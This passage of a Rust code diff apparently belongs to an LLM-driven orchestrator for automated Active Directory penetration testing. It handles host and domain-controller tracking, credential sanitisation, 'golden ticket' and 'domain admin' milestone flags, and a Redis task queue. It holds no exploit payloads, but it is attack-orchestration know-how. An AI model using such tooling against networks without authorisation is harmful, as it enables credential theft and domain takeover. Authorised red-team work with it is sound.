+ let (needs_dc_registration, merged_changed) = { + let mut state = self.inner.write().await; + // Look up by IP first, then fall back to hostname match + let existing_idx = state + .hosts + .iter() + .position(|h| !h.ip.is_empty() && h.ip == host.ip) + .or_else(|| { + if !host.hostname.is_empty() { + state.hosts.iter().position(|h| { + !h.hostname.is_empty() + && h.hostname.eq_ignore_ascii_case(&host.hostname) + }) + } else { + None + } + }); + if let Some(existing) = existing_idx.map(|i| &mut state.hosts[i]) { + // Merge IP if incoming has one and existing doesn't + if !host.ip.is_empty() && existing.ip.is_empty() { + existing.ip = host.ip.clone(); + } + let new_is_dc = host.is_dc || host.detect_dc(); + let was_dc = existing.is_dc; + let had_hostname = !existing.hostname.is_empty(); + let mut changed = false; + + if new_is_dc && !existing.is_dc { + existing.is_dc = true; + changed = true; + } + // Strip AWS hostname from existing entry too + if is_aws_hostname(&existing.hostname) { + existing.hostname = String::new(); + changed = true; + } + if !host.hostname.is_empty() && existing.hostname.is_empty() { + existing.hostname = host.hostname.clone(); + changed = true; + } + for svc in &host.services { + if !existing.services.contains(svc) { + existing.services.push(svc.clone()); + changed = true; + } + } + if !host.os.is_empty() && existing.os.is_empty() { + existing.os = host.os.clone(); + changed = true; + } + if !host.roles.is_empty() && existing.roles.is_empty() { + existing.roles = host.roles.clone(); + changed = true; + } + + if !changed { + return Ok(false); + } + + // Re-register DC if it just became a DC, or if its hostname + // was just filled in (so we can correct the domain mapping). + let is_dc_now = existing.is_dc; + let has_hostname_now = !existing.hostname.is_empty(); + let needs_dc = + (is_dc_now && !was_dc) || (is_dc_now && has_hostname_now && !had_hostname); + (needs_dc, true) + } else { + // No existing host — will be added below + (false, false) + } + }; + + // Register netbios mapping for merged host if hostname was updated + if merged_changed { + let state = self.inner.read().await; + if let Some(merged) = state.hosts.iter().find(|h| h.ip == host.ip) { + if merged.hostname.contains('.') { + let parts: Vec<&str> = merged.hostname.split('.').collect(); + if parts.len() >= 3 { + let short = parts[0].to_uppercase(); + let fqdn = merged.hostname.to_lowercase(); + drop(state); + let _ = self.publish_netbios(queue, &short, &fqdn).await; + } + } + } + } + + // Persist merged host to Redis LIST (find-by-IP and LSET). 
+ if merged_changed { + let state = self.inner.read().await; + if let Some(merged) = state.hosts.iter().find(|h| h.ip == host.ip) { + let op_id = &state.operation_id; + let host_key = format!("{}:{}:{}", state::KEY_PREFIX, op_id, state::KEY_HOSTS,); + let merged_json = serde_json::to_string(merged).unwrap_or_default(); + let mut conn = queue.connection(); + // Scan the Redis LIST to find the index matching this IP + let entries: Vec<String> = + redis::AsyncCommands::lrange(&mut conn, &host_key, 0, -1) + .await + .unwrap_or_default(); + for (idx, entry) in entries.iter().enumerate() { + if let Ok(h) = serde_json::from_str::<Host>(entry) { + if h.ip == host.ip { + let _: Result<(), _> = redis::AsyncCommands::lset( + &mut conn, + &host_key, + idx as isize, + &merged_json, + ) + .await; + break; + } + } + } + } + } + + // If we merged into an existing host and it became/updated as DC, register it + if needs_dc_registration { + let host_snapshot = { + let state = self.inner.read().await; + state + .hosts + .iter() + .find(|h| h.ip == host.ip) + .cloned() + .unwrap() + }; + self.register_dc(queue, &host_snapshot).await?; + return Ok(true); + } + + // If the host already existed (was merged), we're done + { + let state = self.inner.read().await; + if state.hosts.iter().any(|h| h.ip == host.ip) { + return Ok(true); + } + } + + // New host — add to Redis and state + let operation_id = { + let state = self.inner.read().await; + state.operation_id.clone() + }; + let reader = RedisStateReader::new(operation_id); + let mut conn = queue.connection(); + reader.add_host(&mut conn, &host).await?; + + // Update DC map and domain list if this is a domain controller + if host.is_dc || host.detect_dc() { + self.register_dc(queue, &host).await?; + let mut state = self.inner.write().await; + state.hosts.push(host); + return Ok(true); + } + + let mut state = self.inner.write().await; + state.hosts.push(host); + Ok(true) + } + + /// Register a host as a domain controller: update DC map and domain list. + /// + /// Domain is derived from the FQDN hostname (e.g. `dc01.contoso.local` → `contoso.local`). + /// If the hostname is empty or not a valid AD FQDN, we fall back to the first domain + /// already in state (from the target_domain config). This ensures DCs discovered by + /// recon are registered even before their FQDN is known. + pub(crate) async fn register_dc(&self, queue: &TaskQueue, host: &Host) -> Result<()> { + // Extract domain from hostname — prefer a real FQDN + let raw_domain = if !host.hostname.is_empty() { + host.hostname + .split('.') + .skip(1) + .collect::<Vec<&str>>() + .join(".") + } else { + String::new() + }; + + // If we can't derive a domain from the hostname, fall back to the + // target domain already in state. This unblocks automation for DCs + // discovered before their FQDN is resolved.
+ let raw_domain = if raw_domain.is_empty() + || raw_domain.contains("compute.internal") + || raw_domain.contains("amazonaws.com") + { + let state = self.inner.read().await; + if let Some(fallback) = state.domains.first().cloned() { + tracing::info!( + ip = %host.ip, + hostname = %host.hostname, + fallback_domain = %fallback, + "DC registration: using fallback domain (no FQDN available)" + ); + fallback + } else { + tracing::debug!( + ip = %host.ip, + hostname = %host.hostname, + "Skipping DC registration: no FQDN and no fallback domain in state" + ); + return Ok(()); + } + } else { + raw_domain + }; + + let domain = raw_domain; + let domain_lower = domain.to_lowercase(); + + let mut conn = queue.connection(); + let op_id = self.inner.read().await.operation_id.clone(); + let dc_key = format!("{}:{}:{}", state::KEY_PREFIX, op_id, state::KEY_DC_MAP); + + // Remove any stale mapping that pointed this IP to a different domain + { + let state = self.inner.read().await; + let stale_domains: Vec<String> = state + .domain_controllers + .iter() + .filter(|(d, ip)| *ip == &host.ip && **d != domain_lower) + .map(|(d, _)| d.clone()) + .collect(); + for stale in &stale_domains { + tracing::info!( + ip = %host.ip, + old_domain = %stale, + new_domain = %domain_lower, + "Correcting DC domain mapping" + ); + let _: () = conn.hdel(&dc_key, stale).await?; + } + // Remove stale entries from state (done below under write lock) + } + + let _: () = conn.hset(&dc_key, &domain_lower, &host.ip).await?; + + // Add domain to state and Redis, correct stale mappings + let mut state = self.inner.write().await; + + // Remove stale domain → IP mappings for this IP + state + .domain_controllers + .retain(|d, ip| !(ip == &host.ip && *d != domain_lower)); + + // Insert or update the mapping + state + .domain_controllers + .insert(domain_lower.clone(), host.ip.clone()); + + if !state.domains.contains(&domain_lower) { + state.domains.push(domain_lower.clone()); + let domain_key = format!("{}:{}:{}", state::KEY_PREFIX, op_id, state::KEY_DOMAINS); + let _: () = conn.sadd(&domain_key, &domain_lower).await?; + let _: () = conn.expire(&domain_key, 86400).await?; + } + + tracing::info!( + ip = %host.ip, + domain = %domain_lower, + "Registered domain controller" + ); + + Ok(()) + } +} diff --git a/ares-cli/src/orchestrator/state/publishing/milestones.rs b/ares-cli/src/orchestrator/state/publishing/milestones.rs new file mode 100644 index 00000000..33d3efce --- /dev/null +++ b/ares-cli/src/orchestrator/state/publishing/milestones.rs @@ -0,0 +1,156 @@ +//! Milestone publishing: golden ticket, domain admin. + +use std::collections::HashMap; + +use anyhow::Result; + +use ares_core::models::VulnerabilityInfo; +use ares_core::state::RedisStateReader; + +use crate::orchestrator::state::SharedState; +use crate::orchestrator::task_queue::TaskQueue; + +impl SharedState { + /// Set has_golden_ticket flag and persist to Redis.
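+    ///
+    /// Idempotent: returns early if the flag is already set. A minimal call
+    /// sketch (assumes a connected `TaskQueue` named `queue`):
+    /// ```ignore
+    /// state.set_golden_ticket(&queue, "contoso.local").await?;
+    /// ```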
+ pub async fn set_golden_ticket(&self, queue: &TaskQueue, domain: &str) -> Result<()> { + { + let state = self.inner.read().await; + if state.has_golden_ticket { + return Ok(()); + } + } + let operation_id = { + let state = self.inner.read().await; + state.operation_id.clone() + }; + let reader = RedisStateReader::new(operation_id); + let mut conn = queue.connection(); + reader + .set_meta_field( + &mut conn, + "has_golden_ticket", + &serde_json::Value::Bool(true), + ) + .await?; + + // Resolve DC IP for the vulnerability target + let dc_target = { + let state = self.inner.read().await; + state + .domain_controllers + .get(&domain.to_lowercase()) + .cloned() + .unwrap_or_else(|| domain.to_string()) + }; + + let mut state = self.inner.write().await; + state.has_golden_ticket = true; + tracing::info!(domain = %domain, "🏆 Golden ticket flag set"); + drop(state); + + // Synthesize a golden_ticket vulnerability so loot reflects the achievement + let vuln_id = format!("golden_ticket_{}", domain.to_lowercase()); + let mut details = HashMap::new(); + details.insert( + "domain".into(), + serde_json::Value::String(domain.to_string()), + ); + details.insert( + "note".into(), + serde_json::Value::String( + "Golden ticket forged — persistent domain access via krbtgt key".to_string(), + ), + ); + let vuln = VulnerabilityInfo { + vuln_id: vuln_id.clone(), + vuln_type: "golden_ticket".to_string(), + target: dc_target, + discovered_by: "golden_ticket_automation".to_string(), + discovered_at: chrono::Utc::now(), + details, + recommended_agent: String::new(), + priority: 1, + }; + let _ = self.publish_vulnerability(queue, vuln).await; + let _ = self.mark_exploited(queue, &vuln_id).await; + Ok(()) + } + + /// Set has_domain_admin flag and persist to Redis. + pub async fn set_domain_admin(&self, queue: &TaskQueue, path: Option<String>) -> Result<()> { + let operation_id = { + let state = self.inner.read().await; + state.operation_id.clone() + }; + let reader = RedisStateReader::new(operation_id); + let mut conn = queue.connection(); + reader + .set_meta_field( + &mut conn, + "has_domain_admin", + &serde_json::Value::Bool(true), + ) + .await?; + if let Some(ref p) = path { + reader + .set_meta_field( + &mut conn, + "domain_admin_path", + &serde_json::Value::String(p.clone()), + ) + .await?; + } + + let mut state = self.inner.write().await; + state.has_domain_admin = true; + state.domain_admin_path = path.clone(); + + // Emit OTel span recording domain admin achievement. + // Walk parent_id chain from krbtgt hash to compute attack depth.
+ let (attack_path_str, depth) = { + let krbtgt = state.hashes.iter().find(|h| { + h.username.eq_ignore_ascii_case("krbtgt") + && h.hash_type.to_lowercase().contains("ntlm") + }); + let depth = match krbtgt { + Some(h) => { + // Count chain depth by walking parent_id + let mut d = 1usize; + let mut current_id = h.parent_id.clone(); + let mut seen = std::collections::HashSet::new(); + while let Some(ref pid) = current_id { + if !seen.insert(pid.clone()) { + break; + } + d += 1; + // Check credentials then hashes for the parent + if let Some(c) = state.credentials.iter().find(|c| c.id == *pid) { + current_id = c.parent_id.clone(); + } else if let Some(h2) = state.hashes.iter().find(|h2| h2.id == *pid) { + current_id = h2.parent_id.clone(); + } else { + break; + } + } + d + } + None => 0, + }; + let ap = path + .as_deref() + .filter(|s| !s.is_empty()) + .unwrap_or("domain_admin_achieved") + .to_string(); + (ap, depth) + }; + let op_id = state.operation_id.clone(); + drop(state); + + let span = + ares_core::telemetry::spans::trace_domain_admin(&attack_path_str, depth, Some(&op_id)); + let _guard = span.enter(); + tracing::info!(attack_path = %attack_path_str, depth = depth, "🏆 Domain admin achieved"); + + Ok(()) + } +} diff --git a/ares-cli/src/orchestrator/state/publishing/mod.rs b/ares-cli/src/orchestrator/state/publishing/mod.rs new file mode 100644 index 00000000..b205c88f --- /dev/null +++ b/ares-cli/src/orchestrator/state/publishing/mod.rs @@ -0,0 +1,118 @@ +//! Publishing methods — add credentials, hashes, hosts, and vulnerabilities +//! to both in-memory state and Redis. + +mod credentials; +mod entities; +mod hosts; +mod milestones; + +use regex::Regex; +use std::sync::LazyLock; + +/// Regex matching a leading `Password:` prefix (case-insensitive, with optional whitespace around `:`). +pub(super) static PASSWORD_PREFIX_RE: LazyLock<Regex> = + LazyLock::new(|| Regex::new(r"(?i)^password\s*:\s*").unwrap()); + +/// Regex matching trailing parenthetical metadata like ` (Guest)`, ` (Pwn3d!)`. +pub(super) static TRAILING_PAREN_RE: LazyLock<Regex> = + LazyLock::new(|| Regex::new(r"\s+\([^)]+\)\s*$").unwrap()); + +/// Sanitize and validate a credential before storage. +/// +/// Mirrors Python's `add_credential()` — strips noise from password values, +/// normalizes `user@domain@domain` usernames, resolves NetBIOS domains to FQDN, +/// and rejects invalid entries. Returns `None` if the credential should be dropped.
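+///
+/// A worked sketch of the cleanup path (doc-test ignored; assumes the cleaned
+/// pair passes `is_valid_credential`; `Credential` fields as used in this crate):
+/// ```ignore
+/// let cred = ares_core::models::Credential {
+///     id: "c1".into(),
+///     username: "sam.wilson@child.contoso.local@fabrikam.local".into(),
+///     password: "Password: Summer2024! (Pwn3d!)".into(),
+///     domain: String::new(),
+///     source: "netexec".into(),
+///     discovered_at: None,
+///     is_admin: false,
+///     parent_id: None,
+///     attack_step: 0,
+/// };
+/// let clean = sanitize_credential(cred, &std::collections::HashMap::new()).unwrap();
+/// assert_eq!(clean.username, "sam.wilson");
+/// assert_eq!(clean.domain, "child.contoso.local");
+/// assert_eq!(clean.password, "Summer2024!");
+/// ```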
+pub(super) fn sanitize_credential( + mut cred: ares_core::models::Credential, + netbios_to_fqdn: &std::collections::HashMap<String, String>, +) -> Option<ares_core::models::Credential> { + use crate::orchestrator::output_extraction::strip_ansi; + + // Strip ANSI escape codes (tools like NetExec emit colored output) + cred.username = strip_ansi(&cred.username); + cred.password = strip_ansi(&cred.password); + cred.domain = strip_ansi(&cred.domain); + + // Trim whitespace + cred.username = cred.username.trim().to_string(); + cred.password = cred.password.trim().to_string(); + cred.domain = cred.domain.trim().to_string(); + + // Strip "Password: " / "Password:" prefix from password + if PASSWORD_PREFIX_RE.is_match(&cred.password) { + cred.password = PASSWORD_PREFIX_RE.replace(&cred.password, "").to_string(); + } + + // Strip trailing parenthetical metadata: "svc_test (Guest)" → "svc_test" + if TRAILING_PAREN_RE.is_match(&cred.password) { + cred.password = TRAILING_PAREN_RE.replace(&cred.password, "").to_string(); + } + + // Strip ellipsis truncation artifacts (matches Python add_credential) + while cred.password.ends_with("...") { + cred.password = cred.password[..cred.password.len() - 3].trim().to_string(); + } + while cred.password.ends_with('\u{2026}') { + cred.password.pop(); + cred.password = cred.password.trim().to_string(); + } + + // Normalize username with embedded @domain suffixes + // e.g. "sam.wilson@child.contoso.local@fabrikam.local" + // → username="sam.wilson", domain="child.contoso.local" + if cred.username.contains('@') { + let username_clone = cred.username.clone(); + let parts: Vec<&str> = username_clone.splitn(2, '@').collect(); + if parts.len() == 2 && !parts[0].is_empty() { + let base_username = parts[0].to_string(); + let domain_part = parts[1].split('@').next().unwrap_or(parts[1]).to_string(); + if domain_part.contains('.') { + cred.username = base_username; + cred.domain = domain_part; + } + } + } + + // Resolve NetBIOS domain to FQDN (e.g. "CHILD" → "child.contoso.local") + if !cred.domain.is_empty() && !cred.domain.contains('.') { + let domain_upper = cred.domain.to_uppercase(); + if let Some(fqdn) = netbios_to_fqdn.get(&domain_upper) { + // netbios_to_fqdn maps SHORTNAME → host.contoso.local + // Extract the domain suffix + let parts: Vec<&str> = fqdn.split('.').collect(); + if parts.len() >= 3 { + cred.domain = parts[1..].join("."); + } else { + cred.domain = fqdn.clone(); + } + } else { + // Try matching domain as prefix of any FQDN domain suffix + let domain_lower = cred.domain.to_lowercase(); + for fqdn in netbios_to_fqdn.values() { + let fqdn_parts: Vec<&str> = fqdn.split('.').collect(); + if fqdn_parts.len() >= 3 { + let domain_suffix = fqdn_parts[1..].join("."); + let first_label = fqdn_parts[1].to_lowercase(); + if first_label == domain_lower { + cred.domain = domain_suffix; + break; + } + } + } + } + } + + // Validate after sanitization + if !crate::orchestrator::output_extraction::is_valid_credential(&cred.username, &cred.password) + { + return None; + } + + Some(cred) +} + +/// Check if a hostname is an AWS internal PTR name. +pub(super) fn is_aws_hostname(hostname: &str) -> bool { + let lower = hostname.to_lowercase(); + lower.starts_with("ip-") && lower.contains("compute.internal") +} diff --git a/ares-cli/src/orchestrator/state/shared.rs b/ares-cli/src/orchestrator/state/shared.rs new file mode 100644 index 00000000..c74b10e3 --- /dev/null +++ b/ares-cli/src/orchestrator/state/shared.rs @@ -0,0 +1,234 @@ +//! SharedState — thread-safe wrapper around StateInner.
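+//!
+//! A minimal usage sketch (mirrors the unit tests at the bottom of this file):
+//! ```ignore
+//! let state = SharedState::new("op-1".to_string());
+//! state.write().await.domains.push("contoso.local".into());
+//! let snap = state.snapshot().await;
+//! assert_eq!(snap.domains, vec!["contoso.local"]);
+//! ```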
+ +use std::sync::Arc; +use tokio::sync::RwLock; + +use super::inner::StateInner; + +/// Thread-safe shared state with read/write access. +#[derive(Clone)] +pub struct SharedState { + pub(super) inner: Arc<RwLock<StateInner>>, +} + +impl SharedState { + /// Create a new empty state. + pub fn new(operation_id: String) -> Self { + Self { + inner: Arc::new(RwLock::new(StateInner::new(operation_id))), + } + } + + /// Create a cheap snapshot of state for prompt generation. + /// + /// Clones the relevant fields so the RwLock is released before LLM calls. + pub async fn snapshot(&self) -> ares_llm::prompt::StateSnapshot { + let s = self.inner.read().await; + + // Compute undominated forests inline (avoids re-acquiring lock) + let undominated = crate::orchestrator::completion::compute_undominated_forests( + s.target.as_ref().map(|t| t.domain.as_str()), + s.domains.first().map(|d| d.as_str()), + &s.trusted_domains, + &s.dominated_domains, + ); + + ares_llm::prompt::StateSnapshot { + credentials: s.credentials.clone(), + hashes: s.hashes.clone(), + hosts: s.hosts.clone(), + shares: s.shares.clone(), + domains: s.domains.clone(), + discovered_vulnerabilities: s.discovered_vulnerabilities.clone(), + exploited_vulnerabilities: s.exploited_vulnerabilities.clone(), + domain_controllers: s.domain_controllers.clone(), + netbios_to_fqdn: s.netbios_to_fqdn.clone(), + has_domain_admin: s.has_domain_admin, + has_golden_ticket: s.has_golden_ticket, + undominated_forests: undominated, + delegation_accounts: s + .discovered_vulnerabilities + .values() + .filter(|v| { + let vt = v.vuln_type.to_lowercase(); + vt == "constrained_delegation" || vt == "rbcd" + }) + .filter_map(|v| { + v.details + .get("account_name") + .or_else(|| v.details.get("AccountName")) + .and_then(|x| x.as_str()) + .map(|s| s.to_lowercase()) + }) + .collect(), + } + } + + /// Read-only access to the state. + pub async fn read(&self) -> tokio::sync::RwLockReadGuard<'_, StateInner> { + self.inner.read().await + } + + /// Write access to the state. + pub async fn write(&self) -> tokio::sync::RwLockWriteGuard<'_, StateInner> { + self.inner.write().await + } + + /// Get the vuln queue ZSET key. + pub async fn vuln_queue_key(&self) -> String { + let state = self.inner.read().await; + format!( + "{}:{}:{}", + ares_core::state::KEY_PREFIX, + state.operation_id, + super::KEY_VULN_QUEUE + ) + } + + /// Get the discovery list key. + pub async fn discovery_key(&self) -> String { + let state = self.inner.read().await; + format!("{}:{}", super::DISCOVERY_KEY_PREFIX, state.operation_id) + } + + /// Get the operation ID.
+ pub async fn operation_id(&self) -> String { + self.inner.read().await.operation_id.clone() + } +} + +#[cfg(test)] +mod tests { + use super::*; + use ares_core::models::*; + use std::collections::HashMap; + + #[tokio::test] + async fn test_shared_state_new() { + let state = SharedState::new("op-test".into()); + assert_eq!(state.operation_id().await, "op-test"); + } + + #[tokio::test] + async fn test_snapshot_empty_state() { + let state = SharedState::new("op-1".into()); + let snap = state.snapshot().await; + assert!(snap.credentials.is_empty()); + assert!(snap.hashes.is_empty()); + assert!(snap.hosts.is_empty()); + assert!(snap.shares.is_empty()); + assert!(snap.domains.is_empty()); + assert!(snap.discovered_vulnerabilities.is_empty()); + assert!(snap.exploited_vulnerabilities.is_empty()); + assert!(snap.domain_controllers.is_empty()); + assert!(!snap.has_domain_admin); + assert!(!snap.has_golden_ticket); + } + + #[tokio::test] + async fn test_snapshot_reflects_state_mutations() { + let state = SharedState::new("op-1".into()); + + // Mutate state directly + { + let mut inner = state.write().await; + inner.credentials.push(Credential { + id: "c1".into(), + username: "admin".into(), + password: "pass".into(), + domain: "contoso.local".into(), + source: "test".into(), + discovered_at: None, + is_admin: true, + parent_id: None, + attack_step: 0, + }); + inner.domains.push("contoso.local".into()); + inner + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + inner.has_domain_admin = true; + } + + let snap = state.snapshot().await; + assert_eq!(snap.credentials.len(), 1); + assert_eq!(snap.credentials[0].username, "admin"); + assert_eq!(snap.domains, vec!["contoso.local"]); + assert_eq!( + snap.domain_controllers.get("contoso.local"), + Some(&"192.168.58.10".to_string()) + ); + assert!(snap.has_domain_admin); + } + + #[tokio::test] + async fn test_snapshot_is_independent_copy() { + let state = SharedState::new("op-1".into()); + { + let mut inner = state.write().await; + inner.domains.push("contoso.local".into()); + } + + let snap = state.snapshot().await; + assert_eq!(snap.domains.len(), 1); + + // Mutate state after snapshot + { + let mut inner = state.write().await; + inner.domains.push("fabrikam.local".into()); + } + + // Snapshot should still have only 1 domain + assert_eq!(snap.domains.len(), 1); + + // New snapshot should have 2 + let snap2 = state.snapshot().await; + assert_eq!(snap2.domains.len(), 2); + } + + #[tokio::test] + async fn test_vuln_queue_key() { + let state = SharedState::new("op-abc".into()); + let key = state.vuln_queue_key().await; + assert!(key.contains("op-abc")); + assert!(key.ends_with("vuln_queue")); + } + + #[tokio::test] + async fn test_discovery_key() { + let state = SharedState::new("op-xyz".into()); + let key = state.discovery_key().await; + assert!(key.contains("op-xyz")); + assert!(key.starts_with("ares:discoveries:")); + } + + #[tokio::test] + async fn test_snapshot_with_vulnerabilities() { + let state = SharedState::new("op-1".into()); + { + let mut inner = state.write().await; + let mut details = HashMap::new(); + details.insert("account".into(), serde_json::json!("svc_sql")); + inner.discovered_vulnerabilities.insert( + "vuln-001".into(), + VulnerabilityInfo { + vuln_id: "vuln-001".into(), + vuln_type: "constrained_delegation".into(), + target: "192.168.58.20".into(), + discovered_by: "recon".into(), + discovered_at: chrono::Utc::now(), + details, + recommended_agent: "privesc".into(), + priority: 3, + }, + ); + 
inner.exploited_vulnerabilities.insert("vuln-002".into()); + } + + let snap = state.snapshot().await; + assert_eq!(snap.discovered_vulnerabilities.len(), 1); + assert!(snap.discovered_vulnerabilities.contains_key("vuln-001")); + assert_eq!(snap.exploited_vulnerabilities.len(), 1); + assert!(snap.exploited_vulnerabilities.contains("vuln-002")); + } +} diff --git a/ares-cli/src/orchestrator/task_queue.rs b/ares-cli/src/orchestrator/task_queue.rs new file mode 100644 index 00000000..2385e9e3 --- /dev/null +++ b/ares-cli/src/orchestrator/task_queue.rs @@ -0,0 +1,488 @@ +//! Redis-backed task queue matching the Python `RedisTaskQueue`. +//! +//! Key patterns: +//! - `ares:tasks:{role}` — List, per-role task queue +//! - `ares:results:{task_id}` — List, per-task result mailbox (TTL 24h) +//! - `ares:heartbeat:{agent}` — String, agent heartbeat (TTL from config) +//! - `ares:task_status:{task_id}` — String, task lifecycle JSON +//! - `ares:lock:{op_id}` — String, operation lock with TTL refresh +//! +//! Workers BRPOP from the right; the orchestrator pushes to the left (LPUSH) +//! for normal priority and to the right (RPUSH) for urgent priority, giving +//! FIFO semantics with priority bypass. + +use std::collections::HashMap; +use std::time::Duration; + +use anyhow::{Context, Result}; +use chrono::{DateTime, Utc}; +use redis::aio::ConnectionManager; +use redis::AsyncCommands; +use serde::{Deserialize, Serialize}; +use tracing::{debug, info, warn}; +use uuid::Uuid; + +// --------------------------------------------------------------------------- +// Constants — must match the Python RedisTaskQueue class attributes exactly. +// --------------------------------------------------------------------------- + +pub const TASK_QUEUE_PREFIX: &str = "ares:tasks"; +pub const RESULT_QUEUE_PREFIX: &str = "ares:results"; +pub const HEARTBEAT_PREFIX: &str = "ares:heartbeat"; +pub const TASK_STATUS_PREFIX: &str = "ares:task_status"; +pub const LOCK_PREFIX: &str = "ares:lock"; +pub const STATE_UPDATE_CHANNEL_PREFIX: &str = "ares:state:updates"; + +/// Result keys expire after 24 hours. +const RESULT_TTL_SECS: u64 = 60 * 60 * 24; + +/// Task status keys expire after 24 hours. +const TASK_STATUS_TTL_SECS: u64 = 60 * 60 * 24; + +// --------------------------------------------------------------------------- +// Wire types — JSON-compatible with the Python TaskMessage / TaskResult. +// --------------------------------------------------------------------------- + +/// Task submitted to a role queue. Mirrors `ares.core.task_queue.TaskMessage`. +#[derive(Debug, Clone, Serialize, Deserialize)] +pub struct TaskMessage { + pub task_id: String, + pub task_type: String, + pub source_agent: String, + pub target_agent: String, + pub payload: serde_json::Value, + #[serde(default = "default_priority")] + pub priority: i32, + pub created_at: Option<DateTime<Utc>>, + pub callback_queue: Option<String>, +} + +fn default_priority() -> i32 { + 5 +} + +/// Result returned by a worker. Mirrors `ares.core.task_queue.TaskResult`. +#[derive(Debug, Clone, Serialize, Deserialize)] +pub struct TaskResult { + pub task_id: String, + pub success: bool, + #[serde(default)] + pub result: Option<serde_json::Value>, + #[serde(default)] + pub error: Option<String>, + pub completed_at: Option<DateTime<Utc>>, + #[serde(default)] + pub worker_pod: Option<String>, + #[serde(default)] + pub agent_name: Option<String>, +} + +/// Heartbeat payload written by agents.
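+///
+/// Illustrative wire format (values are examples only):
+/// ```json
+/// {"agent": "recon", "status": "working", "timestamp": "2026-04-17T14:13:23Z",
+///  "current_task": "recon_ab12cd34ef56", "pod_name": "ares-worker-recon-0"}
+/// ```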
+#[derive(Debug, Clone, Serialize, Deserialize)] +pub struct HeartbeatData { + pub agent: String, + pub status: String, + pub timestamp: String, + #[serde(default)] + pub current_task: Option<String>, + #[serde(default)] + pub pod_name: Option<String>, +} + +// --------------------------------------------------------------------------- +// TaskQueue — thin async wrapper around a redis ConnectionManager. +// --------------------------------------------------------------------------- + +/// Async Redis task queue implementing the Ares queue protocol. +#[derive(Clone)] +pub struct TaskQueue { + conn: ConnectionManager, +} + +#[allow(dead_code)] +impl TaskQueue { + /// Create a new queue from an existing connection manager. + pub fn new(conn: ConnectionManager) -> Self { + Self { conn } + } + + /// Connect to Redis and return a TaskQueue. + pub async fn connect(redis_url: &str) -> Result<Self> { + let client = redis::Client::open(redis_url) + .with_context(|| format!("Invalid Redis URL: {redis_url}"))?; + // Default response_timeout is 500ms which is too short for BRPOP + // blocking calls (tool results can take minutes). Without this fix, + // the client-side timeout cancels the future but the server-side + // BRPOP remains registered, consuming results that are silently lost. + let config = redis::aio::ConnectionManagerConfig::new() + .set_response_timeout(Some(Duration::from_secs(1800))); + let conn = client + .get_connection_manager_with_config(config) + .await + .with_context(|| format!("Failed to connect to Redis at {redis_url}"))?; + info!(url = %redis_url, "Connected to Redis"); + Ok(Self { conn }) + } + + // === Key helpers ======================================================== + + #[inline] + fn task_queue_key(role: &str) -> String { + format!("{TASK_QUEUE_PREFIX}:{role}") + } + + #[inline] + fn result_queue_key(task_id: &str) -> String { + format!("{RESULT_QUEUE_PREFIX}:{task_id}") + } + + #[inline] + fn heartbeat_key(agent: &str) -> String { + format!("{HEARTBEAT_PREFIX}:{agent}") + } + + #[inline] + fn task_status_key(task_id: &str) -> String { + format!("{TASK_STATUS_PREFIX}:{task_id}") + } + + // === Orchestrator methods =============================================== + + /// Submit a task to a role's queue. + /// + /// Priority <= 2 (urgent) uses RPUSH so the task is consumed first by + /// workers that BRPOP from the right. All other priorities use LPUSH for + /// FIFO order.
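+    ///
+    /// A call sketch (assumes a reachable Redis behind this queue):
+    /// ```ignore
+    /// // Normal priority (5): LPUSH, FIFO behind earlier tasks.
+    /// let id = queue.submit_task("recon", "recon", serde_json::json!({}), "orchestrator", 5).await?;
+    /// // Urgent priority (<= 2): RPUSH, consumed before queued normal-priority tasks.
+    /// let urgent = queue.submit_task("exploit", "privesc", serde_json::json!({}), "orchestrator", 1).await?;
+    /// ```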
+ pub async fn submit_task( + &self, + task_type: &str, + target_role: &str, + payload: serde_json::Value, + source_agent: &str, + priority: i32, + ) -> Result<String> { + let task_id = format!("{}_{}", task_type, &Uuid::new_v4().to_string()[..12]); + let callback = Self::result_queue_key(&task_id); + + let msg = TaskMessage { + task_id: task_id.clone(), + task_type: task_type.to_string(), + source_agent: source_agent.to_string(), + target_agent: target_role.to_string(), + payload, + priority, + created_at: Some(Utc::now()), + callback_queue: Some(callback), + }; + + let queue_key = Self::task_queue_key(target_role); + let json = serde_json::to_string(&msg).context("Failed to serialize TaskMessage")?; + + let mut conn = self.conn.clone(); + if priority <= 2 { + conn.rpush::<_, _, ()>(&queue_key, &json) + .await + .with_context(|| format!("RPUSH to {queue_key}"))?; + info!(task_id = %task_id, queue = %queue_key, priority, "Urgent task submitted (RPUSH)"); + } else { + conn.lpush::<_, _, ()>(&queue_key, &json) + .await + .with_context(|| format!("LPUSH to {queue_key}"))?; + info!(task_id = %task_id, queue = %queue_key, priority, "Task submitted (LPUSH)"); + } + + // Track status + self.set_task_status(&task_id, "pending").await?; + + Ok(task_id) + } + + /// Non-destructive peek: does a result exist for this task? + pub async fn has_pending_result(&self, task_id: &str) -> Result<bool> { + let key = Self::result_queue_key(task_id); + let mut conn = self.conn.clone(); + let len: i64 = conn.llen(&key).await.unwrap_or(0); + Ok(len > 0) + } + + /// Non-blocking check for a task result (RPOP). + pub async fn check_result(&self, task_id: &str) -> Result<Option<TaskResult>> { + let key = Self::result_queue_key(task_id); + let mut conn = self.conn.clone(); + let data: Option<String> = conn.rpop(&key, None).await?; + match data { + Some(json) => { + let result: TaskResult = serde_json::from_str(&json) + .with_context(|| format!("Bad TaskResult JSON for {task_id}"))?; + Ok(Some(result)) + } + None => Ok(None), + } + } + + /// Batch-check results for multiple task IDs using a pipeline. + pub async fn check_results_batch( + &self, + task_ids: &[String], + ) -> Result<HashMap<String, Option<TaskResult>>> { + if task_ids.is_empty() { + return Ok(HashMap::new()); + } + + let mut pipe = redis::pipe(); + for tid in task_ids { + let key = Self::result_queue_key(tid); + pipe.cmd("RPOP").arg(key); + } + + let mut conn = self.conn.clone(); + let raw: Vec<Option<String>> = pipe + .query_async(&mut conn) + .await + .context("Pipeline check_results_batch failed")?; + + let mut out = HashMap::with_capacity(task_ids.len()); + for (tid, data) in task_ids.iter().zip(raw) { + let parsed = match data { + Some(json) => match serde_json::from_str::<TaskResult>(&json) { + Ok(r) => Some(r), + Err(e) => { + warn!(task_id = %tid, err = %e, "Ignoring malformed TaskResult"); + None + } + }, + None => None, + }; + out.insert(tid.clone(), parsed); + } + Ok(out) + } + + /// Blocking wait for a result (BRPOP). Timeout in seconds. + pub async fn poll_result( + &self, + task_id: &str, + timeout_secs: f64, + ) -> Result<Option<TaskResult>> { + let key = Self::result_queue_key(task_id); + let mut conn = self.conn.clone(); + let result: Option<(String, String)> = conn + .brpop(&key, 